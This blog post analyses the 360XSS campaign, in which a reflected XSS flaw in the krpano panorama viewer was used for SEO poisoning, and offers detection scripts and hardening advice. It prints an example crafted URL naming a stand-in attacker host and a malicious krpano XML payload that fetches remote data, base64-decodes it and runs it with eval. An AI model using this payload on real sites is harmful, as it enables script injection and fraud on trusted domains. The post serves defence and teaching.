SEO Poisoning through XSS Vulnerabilities: The 360XSS Campaign

The 360XSS campaign, which pairs the abuse of trusted domains with a cross-site scripting vulnerability, is a notable development in malicious search engine optimization (SEO). I’m especially struck by how the attackers turned an apparently straightforward reflected XSS vulnerability into an extensive operation affecting more than 350 well-known websites. The property that made it so effective, the trust that search engines and users extend to established domains, is also what makes it such a serious security risk.

The Attack Mechanism

What makes this attack notable is how it solved the basic limitation of reflected XSS vulnerabilities: the need for user interaction. Traditionally, a victim of reflected XSS has to be lured into clicking a crafted URL. By getting the crafted URLs indexed and ranked by search engines, the 360XSS campaign turned search results into its distribution channel, so victims arrived through ordinary searches.

The attack chain worked as follows:

  1. Attackers identified websites running vulnerable versions of the Krpano panorama framework, primarily those older than version 1.20.10.

  2. They injected malicious scripts through the xml query parameter: with the passQueryParameters option enabled, the viewer accepted an attacker-supplied XML file named in the URL, and the actions in that file could execute arbitrary JavaScript in the context of the vulnerable site.

  3. These malicious scripts injected hidden content and spam-related keywords into the webpage, manipulating search engine indexing on compromised yet reputable domains.

  4. When unsuspecting users clicked these search results, the crafted URLs took them to the legitimate but compromised websites.

  5. Upon execution of the XSS payload, users were further redirected through a chain of trusted domains, ultimately landing on spam-related content.

# Example of malicious URL exploiting the vulnerability
https://trusted-university.edu/virtualtour/index.html?xml=https://attacker-controlled-site.com/malicious.xml

# The malicious XML file content
<krpano>
  <action name="startup" autorun="onstart">
    js(
      fetch('https://legitimate-compromised-site.com/data.txt')
      .then(response => response.text())
      .then(data => {
        const decoded = atob(data);
        eval(decoded);
      })
    );
  </action>
</krpano>
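The crafted URL above leaves a recognisable trace in ordinary web-server access logs, so a site owner can look for it without any client-side instrumentation. The following is an added defender-side example, not code from the original post: it scans combined-format log lines for requests whose xml parameter resolves to an origin other than the site's own, and notes whether the visitor arrived from a search-engine referrer (the signature of a poisoned result). The log lines, host names, addresses and timestamps are constructed placeholders. The check goes slightly beyond the single URL shown above: protocol-relative, percent-encoded and non-http values are all normalised by the URL parser before the host comparison, so the usual ways of disguising an external reference are covered.

```javascript
// Added example (not from the original post): scan web-server access-log
// lines for requests whose "xml" query parameter resolves to a foreign origin,
// the request shape a 360XSS-style crafted URL leaves behind.

// Constructed sample lines in Apache/nginx combined log format; all hosts,
// addresses and timestamps are placeholders.
const SAMPLE_LOG = [
  '203.0.113.7 - - [10/Mar/2025:12:00:01 +0000] "GET /virtualtour/index.html?xml=https://attacker-controlled-site.example/malicious.xml HTTP/1.1" 200 5120 "https://www.google.com/" "Mozilla/5.0"',
  '203.0.113.8 - - [10/Mar/2025:12:00:05 +0000] "GET /virtualtour/index.html?startscene=lobby HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
  '203.0.113.9 - - [10/Mar/2025:12:00:09 +0000] "GET /virtualtour/index.html?xml=tour.xml HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
  '203.0.113.10 - - [10/Mar/2025:12:00:12 +0000] "GET /virtualtour/index.html?xml=//attacker-controlled-site.example/m.xml HTTP/1.1" 200 5120 "https://www.bing.com/search?q=virtual+tour" "Mozilla/5.0"',
  '203.0.113.11 - - [10/Mar/2025:12:00:20 +0000] "GET /virtualtour/index.html?xml=https%3A%2F%2Fattacker-controlled-site.example%2Fenc.xml HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
];

// Capture groups: ip, timestamp, method, request target, status, referer, user agent.
const LOG_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) \S+" (\d{3}) \S+ "([^"]*)" "([^"]*)"$/;

// A referrer from a major search engine means the visitor arrived through a
// search result rather than by typing the URL or following a link on the site.
const SEARCH_ENGINE_RE = /(^|\.)(google|bing|yahoo|duckduckgo|yandex)\./i;

// Resolves the xml parameter of a request target against the site's own origin.
// Returns null when there is no xml parameter; otherwise reports whether the
// value points outside ownHost. Protocol-relative, percent-encoded and
// non-http values are normalised by the URL parser before the comparison.
function classifyXmlParam(requestTarget, ownHost) {
  let request;
  try {
    request = new URL(requestTarget, `https://${ownHost}/`);
  } catch (e) {
    return null; // malformed request line, nothing to judge
  }
  const xml = request.searchParams.get('xml');
  if (xml === null) return null;
  let target;
  try {
    target = new URL(xml, request); // relative paths resolve the way the viewer would
  } catch (e) {
    return { xml, resolved: null, foreign: true };
  }
  const foreign = target.host !== ownHost || !/^https?:$/.test(target.protocol);
  return { xml, resolved: target.href, foreign };
}

function refererFromSearchEngine(referer) {
  try {
    return SEARCH_ENGINE_RE.test(new URL(referer).hostname);
  } catch (e) {
    return false; // "-" or an unparseable referrer
  }
}

// Returns one finding per request whose xml parameter points off-site.
function scanAccessLog(lines, ownHost) {
  const findings = [];
  for (const line of lines) {
    const m = LOG_RE.exec(line);
    if (!m) continue;
    const [, ip, time, , path, , referer] = m;
    const verdict = classifyXmlParam(path, ownHost);
    if (!verdict || !verdict.foreign) continue;
    findings.push({
      ip,
      time,
      path,
      xmlTarget: verdict.resolved,
      referer,
      fromSearchEngine: refererFromSearchEngine(referer),
    });
  }
  return findings;
}

if (typeof require !== 'undefined' && require.main === module) {
  console.table(scanAccessLog(SAMPLE_LOG, 'trusted-university.edu'));
}
```

Run against the constructed lines, three of the five requests are flagged: the plain external URL, the protocol-relative form and the percent-encoded form, while the request with no xml parameter and the one pointing at the site's own tour.xml pass. Piping real logs through the same function (one line per array element) and alerting on any finding with fromSearchEngine set is a cheap way to notice that a domain is being used for SEO poisoning before the search results themselves are reviewed.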

Domain Trust Exploitation

This strategy was effective because it exploited the inherent trust search engines place in high-authority domains. By compromising websites belonging to:

  • Government portals

  • U.S. state government websites

  • Prestigious universities, including Yale

  • Fortune 500 companies

  • Major hotel chains

  • Reputable news organizations

Attackers were able to “borrow” the domain authority and credibility these sites had built over time. Search engines like Google, which prioritize results from well-established domains, inadvertently boosted the visibility of these hijacked pages, granting them premium placement in search results and increasing the likelihood of user interaction.

Multi-Stage Payload Delivery

This attack’s effectiveness stemmed from its multi-stage payload delivery, designed to evade detection by security systems. The staged execution unfolded as follows:

  1. Initial Compromise: The first hacked URL contained an XML parameter engineered to redirect users.

  2. Trusted Site Redirection: This parameter pointed to another legitimate and trusted website, reducing suspicion.

  3. Encoded Payload Execution: The second site leveraged an XML document to execute a Base64-encoded payload, masking its true intent.

  4. Final Content Retrieval: Once decoded, the payload fetched the targeted advertising material from yet another trusted domain.

This chain of redirects through trusted domains effectively laundered the malicious nature of the final destination, making it extremely difficult for security solutions to detect or flag.

Impact and Monetization Strategy

The primary objective of this campaign was to exploit hijacked websites to serve advertisements, primarily promoting:

  • Adult content

  • Dietary supplements

  • Online gambling platforms

  • Fake news websites

Additionally, some compromised pages were weaponized to artificially inflate YouTube video views, suggesting a diverse monetization strategy beyond simple ad placements.

Notably, the absence of more destructive payloads — such as malware deployment or credential theft — suggests that this operation was likely orchestrated by an unethical advertising network rather than conventional cybercriminals. Instead of engaging in direct cybercrime, the attackers focused on maximizing ad revenue through fraudulent impressions, effectively laundering traffic through trusted, high-authority domains to evade detection.

Why It Was Difficult to Detect

This attack was exceptionally stealthy due to several key factors:

  1. Leveraging Trusted Domains — Every stage of the attack chain utilized legitimate, high-authority websites, reducing suspicion and bypassing traditional blacklists.

  2. Reflected XSS with No Persistent Footprint — Since the XSS payload was reflected rather than stored, it left minimal forensic evidence on compromised servers, making detection and remediation difficult.

  3. Exploitation of a Legitimate Framework Feature — Instead of targeting an obvious software vulnerability, the attackers misused an existing feature within the Krpano framework, allowing the attack to blend in with normal functionality.

  4. Multi-Stage JavaScript Execution via Redirections — The payload executed across multiple redirections, effectively obfuscating the attack’s origin and making it harder for security tools to track the malicious activity.

These tactics combined to create a highly evasive campaign, allowing attackers to operate under the radar while maximizing fraudulent ad revenue.

Detection Script for Website Owners

// Run this in browser console to detect potential 360XSS compromise
(function detectXSSPayloads() {
  // Check for suspicious hidden content
  const hiddenDivs = Array.from(document.querySelectorAll('div')).filter(div => {
    const style = window.getComputedStyle(div);
    return (style.position === 'absolute' && 
           (style.left === '-9999px' || style.top === '-9999px'));
  });

  // Check for suspicious scripts with base64 or eval
  const scripts = Array.from(document.scripts);
  const suspiciousScripts = scripts.filter(script => 
    script.text.includes('atob(') || 
    script.text.includes('eval(') ||
    (script.text.includes('setTimeout') && script.text.includes('window.location'))
  );

  if (hiddenDivs.length > 0 || suspiciousScripts.length > 0) {
    console.warn('POTENTIAL XSS SEO POISONING DETECTED!');
    console.log('Suspicious hidden divs:', hiddenDivs);
    console.log('Suspicious scripts:', suspiciousScripts);
    return true;
  }
  return false;
})();

Defensive Strategies

For Businesses Using the Krpano Framework

To mitigate the risk of exploitation, organizations leveraging Krpano should implement the following security measures:

  • Update to Krpano version 1.22.4 or higher to patch known vulnerabilities.

  • Set passQueryParameters = false by default to prevent unauthorized parameter injection.

  • Restrict the execution of external scripts to limit the risk of malicious code injection.

  • Regularly audit outbound links and unusual content using Google Search Console or similar tools to detect unauthorized modifications.

<!-- VULNERABLE CONFIGURATION -->
<script src="krpano.js"></script>
<div id="pano" style="width:100%;height:600px;"></div>
<script>
    embedpano({
        xml: "tour.xml",
        target: "pano",
        html5: "auto",
        passQueryParameters: true  // Dangerous: passes all URL parameters without filtering
    });
</script>

<!-- SECURE CONFIGURATION -->
<script src="krpano.js"></script>
<div id="pano" style="width:100%;height:600px;"></div>
<script>
    embedpano({
        xml: "tour.xml",
        target: "pano",
        html5: "auto",
        passQueryParameters: false,  // Safest option: disable parameter passing
        // Alternative: if URL parameters are genuinely needed, pass only a
        // comma-separated allowlist of harmless names (string form in recent
        // releases; check the embedpano documentation for your version).
        // Never include "xml" or action-bearing parameters such as
        // "startactions", since krpano actions can call js() and would
        // reintroduce script execution from the URL.
        // passQueryParameters: "startscene"
    });
</script>
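A stricter variant of the allowlist approach is to keep passQueryParameters off entirely and have the page code decide which visitor-supplied parameters reach the viewer. The following is an added example, not code from krpano or from the original post: it allowlists parameter names, restricts their values to identifier-like tokens, records what was dropped, and forwards only the vetted values through embedpano's vars setting (assumed here to be supported by the deployed viewer version). The xml parameter is deliberately never allowlisted, and neither are action-bearing parameters such as startactions, since krpano action syntax can call js().

```javascript
// Added example (not krpano's own code): allowlist visitor-supplied query
// parameters in page code before handing them to the viewer, so the viewer
// itself never reads location.search (passQueryParameters stays false).

// Only these parameter names are forwarded. "xml" is deliberately absent
// (the tour file is chosen by the page, never by the visitor), and so are
// action-bearing parameters such as "startactions", because krpano action
// syntax can call js() and would reintroduce script execution from the URL.
const ALLOWED_PARAMS = new Set(['startscene']);

// Scene names are identifier-like; URLs, slashes, quotes, parentheses and
// semicolons are never legitimate here, so the value pattern excludes them.
const SAFE_VALUE = /^[A-Za-z0-9_.-]{1,64}$/;

// Splits a query string into the accepted key/value pairs and a list of
// rejected entries with the reason, so the page can log or alert on them.
function filterQueryParameters(search, allowed = ALLOWED_PARAMS) {
  const accepted = {};
  const rejected = [];
  for (const [key, value] of new URLSearchParams(search)) {
    if (!allowed.has(key)) {
      rejected.push({ key, reason: 'not allowlisted' });
    } else if (!SAFE_VALUE.test(value)) {
      rejected.push({ key, reason: 'unsafe value' });
    } else {
      accepted[key] = value;
    }
  }
  return { accepted, rejected };
}

// Builds the embedpano() settings: the xml path is fixed by the page, query
// passing is off, and vetted values go through the "vars" setting (assumed
// here to be supported by the deployed krpano version).
function buildEmbedOptions(search) {
  const { accepted, rejected } = filterQueryParameters(search);
  if (rejected.length > 0) {
    // Constructed behaviour: log the drop and continue with the safe subset.
    console.warn('Dropped query parameters:', rejected);
  }
  return {
    xml: 'tour.xml',
    target: 'pano',
    html5: 'auto',
    passQueryParameters: false,
    vars: accepted,
  };
}

// In the page: embedpano(buildEmbedOptions(window.location.search));
```

With this in place a URL carrying xml=https://attacker-controlled-site.example/m.xml or startactions=lookat(0,0) yields an options object containing only the scene name, and the rejected entries give the site owner a client-side signal that someone is probing the parameter.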

For the Broader Security Community

Security professionals and organizations should take proactive steps to protect against similar attack techniques:

  • Deploy defensive HTTP headers, above all a Content-Security-Policy that restricts where scripts may load from and be fetched from, alongside X-Frame-Options and Referrer-Policy, to harden sites against script injection and its follow-on stages.

  • Watch for suspicious search patterns or unexpected spikes in traffic from SEO poisoning attacks leveraging your domain.

  • Recognize that misconfigurations can be just as dangerous as code vulnerabilities; ensure security settings are properly configured to reduce attack surfaces.

Conclusion

The 360XSS campaign shows how attackers keep refining their methods and finding inventive ways to profit from even seemingly straightforward vulnerabilities. By exploiting the trust that search engines place in well-known websites, they turned a reflected XSS vulnerability into a large-scale SEO poisoning platform.

This case is a reminder that security extends beyond patching known vulnerabilities to the secure configuration of legitimate features. It also shows why attackers remain motivated to target seemingly low-risk components of high-value websites: the value lies in the trusted domain itself.

Written by Adelowo Similoluwa